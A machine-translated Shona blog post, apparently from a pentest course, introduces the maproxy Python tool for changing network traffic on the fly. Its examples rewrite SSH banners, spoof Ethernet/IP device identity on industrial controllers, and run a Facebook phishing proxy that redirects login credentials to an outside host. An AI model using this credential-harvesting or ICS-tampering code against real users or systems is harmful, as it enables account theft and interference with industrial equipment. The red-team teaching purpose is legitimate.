ProHoster > Blog > Utongi > Gadzirisa data yetiweki pane nhunzi

Gadzirisa data yetiweki pane nhunzi

Kuturikirwa kwechinyorwa kwakagadzirirwa manheru ekutanga kwekosi “Pentest. Penetration test practice".

Gadzirisa data yetiweki pane nhunzi

chirevo

Mhando dzakasiyana-siyana dzekuongorora kuchengetedza, kubva pakuyedzwa kwekupinda mukati uye Red Team mashandiro kusvika kubaya maIoT/ICS zvishandiso uye SCADA, zvinosanganisira kushanda nemabhinari network protocol, kureva, kubata nekugadzirisa data retiweki pakati pemutengi nechinangwa. Sniffing network traffic harisi basa rakaoma sezvo isu tine maturusi akaita seWireshark, Tcpdump kana Scapy, asi kugadziridzwa kunoratidzika kunge ibasa rinonyanya kushanda sezvo tichizoda kuve nerumwe rudzi rwekuti tiverenge network data, kuisefa, chinja. it on the fly and send it back to the target host in almost real time. Pamusoro pezvo, zvingave zvakanaka kana chishandiso chakadaro chaigona kungoshanda neakawanda anoenderana kubatanidza uye kuve customizable uchishandisa zvinyorwa.

Rimwe zuva ndakawana mudziyo unonzi maproxy, zvinyorwa zvakakurumidza kundijekesera kuti maproxy - chete zvandinoda. Iyi iri nyore, inogoneka uye inogadziriswa nyore TCP proxy. Ndakaedza chishandiso ichi pane akati wandei akaomarara maapplication, anosanganisira ICS zvishandiso (izvo zvinogadzira akawanda mapaketi) kuti ndione kana ichigona kubata akawanda akafanana anobatana, uye chishandiso chakaita nemazvo.

Ichi chinyorwa chinokuzivisa iwe kugadzirisa network data pane nhunzi uchishandisa maproxy.

tsananguro

Tool maproxy yakavakirwa paTornado, inozivikanwa uye yakakura asynchronous networking system muPython.

Kazhinji, inogona kushanda mune akati wandei modes:

  • TCP:TCP - TCP yekubatanidza isina kunyorwa;
  • TCP:SSL и SSL:TCP - ne-one-way encryption;
  • SSL:SSL - nzira mbiri encryption.

Inouya seraibhurari. Kuti utange nekukurumidza, unogona kushandisa mafaira emuenzaniso anoratidza huru raibhurari mabasa:

  • all.py
  • certificate.pem
  • logging_proxy.py
  • privatekey.pem
  • ssl2ssl.py
  • ssl2tcp.py
  • tcp2ssl.py
  • tcp2tcp.py

Nyaya 1 - nyore bidirectional proxy

Maererano ne tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

kubudikidza default ProxyServer() inotora nharo mbiri - nzvimbo yekubatanidza uye chiteshi chengarava. server.listen() inotora nharo imwe - chiteshi chekuteerera kune inouya yekubatanidza.

Kuita script:

# python tcp2tcp.py

Kuti tiite bvunzo, tichabatanidza kune yemuno SSH server kuburikidza neproxy script yedu, inoteerera 2222/tcp port uye inobatanidza kune yakajairwa chiteshi 22/tcp SSH maseva:

Gadzirisa data yetiweki pane nhunzi

Iyo yekugamuchira banner inokuzivisa iwe kuti yedu muenzaniso script yakabudirira proxyed network traffic.

Mhosva 2 - kugadzirisa data

Imwe demo script logging_proxy.py yakanakira kufambidzana netiweki data. Maonero ari mufaira anotsanangura nzira dzekirasi dzaunogona kushandura kuti uzadzise chinangwa chako:

Gadzirisa data yetiweki pane nhunzi

Chinhu chinonyanya kufadza chiri pano:

  • on_c2p_done_read - kubata data munzira kubva kumutengi kuenda kune server;
  • on_p2s_done_read - kudzoserwa shure.

Ngatiedze kushandura SSH banner iyo sevha inodzokera kumutengi:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

Tora script:

Gadzirisa data yetiweki pane nhunzi

Sezvauri kuona, mutengi akarasika nekuti zita reSSH server kwaari rakachinjirwa kuita «DumnySSH».

Gadzirisa data yetiweki pane nhunzi

Nyaya 3 - nyore phishing peji rewebhu

Kune nzira dzisingaperi dzekushandisa chishandiso ichi. Ino nguva ngatitarisei pane chimwe chinhu chinoshanda kubva kuRed Team mashandiro edivi. Ngatitevedzerei peji yekumhara m.facebook.com uye shandisa dura retsika ine typo nemaune, semuenzaniso, m.facebok.com. Nezvinangwa zvekuratidzira, ngatingofungidzira kuti iyo domain yakanyoreswa nesu.

Isu tichagadzira isina kuvharirwa network yekubatanidza nevatiwisira proxy uye SSL Stream kune Facebook server (31.13.81.36) Kuita kuti muenzaniso uyu ushande, tinofanirwa kutsiva iyo HTTP host musoro uye jekiseni rakakodzera zita remugamuchiri, uye isu tichadzimawo kudzvanya kwekupindura kuti tigone kuwana zviri mukati zviri nyore. Pakupedzisira isu tichatsiva iyo HTML fomu kuitira kuti magwaro ekupinda atumirwe kwatiri panzvimbo yemaseva eFacebook:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/sn/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

Muchidimbu:

Gadzirisa data yetiweki pane nhunzi

Sezvauri kuona, isu takabudirira kukwanisa kutsiva yekutanga saiti.

Nyaya 4 - Porting Ethernet/IP

Ndanga ndichishanda nemidziyo yemaindasitiri uye software (ICS/SCADA) kwenguva yakati rebei, senge programmable controllers (PLC), I/O modules, madhiraivha, relays, ladder programming environments nezvimwe zvakawanda. Nyaya iyi ndeye vanoda zvinhu zvemaindasitiri. Kubira mhinduro dzakadai kunosanganisira kushingaira kutamba netiweki protocol. Mumuenzaniso unotevera, ndinoda kuratidza maitiro aungaita ICS/SCADA network traffic.

Kuti uite izvi, iwe uchada zvinotevera:

  • Network sniffer, semuenzaniso, Wireshark;
  • Ethernet/IP kana kungoti SIP mudziyo, unogona kuiwana uchishandisa Shodan sevhisi;
  • Script yedu yakavakirwa pa maproxy.

Kutanga, ngatitarisei kuti yakajairwa chiziviso mhinduro kubva kuCIP (Common Industrial Protocol) inoita senge:

Gadzirisa data yetiweki pane nhunzi

Kuzivikanwa kwemudziyo kunoitwa pachishandiswa Ethernet/IP protocol, inova vhezheni yakagadziridzwa yeindasitiri Ethernet protocol inoputira kutonga mapuroteni seCIP. Isu ticha shandura iyo yakavhenekerwa ID zita rinoonekwa mune iyo skrini "NI-IndComm yeEthernet" tichishandisa proxy script yedu. Tinogona kushandisa zvakare script logging_proxy.py uye nenzira yakafanana shandura nzira yekirasi on_p2s_done_read, nekuti tinoda kuti zita rakasiyana rekuzivikanwa rionekwe pamutengi.

Code:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

Chaizvoizvo, takakumbira kuzivikanwa kwemudziyo kaviri, mhinduro yechipiri yaive yekutanga, uye yekutanga yakagadziridzwa panhunzi.

Uye yekupedzisira

Mukufunga kwangu maproxy Chishandiso chiri nyore uye chiri nyore, icho chakanyorwa zvakare muPython, saka ndinotenda kuti iwewo unogona kubatsirwa nekuishandisa. Ehe, kune mamwe maturusi akaomesesa ekugadzirisa nekugadzirisa network data, asi ivo vanodawo kutariswa kwakawanda uye kazhinji vanogadzirwa kune imwe nyaya yekushandisa, semuenzaniso. Muraena, Modlishka kana evilginx nokuda kwemhosva dzakafanana neyechitatu, kana canape kwekupedzisira. Imwe nzira kana imwe, nerubatsiro maproxy unogona kukurumidza kushandisa mazano ako ekubvunzurudza data yetiweki, sezvo zvinyorwa zvemuenzaniso zvakajeka.

Kuedza nzira dzechokwadi muWindows AD

Source: www.habr.com

Voeg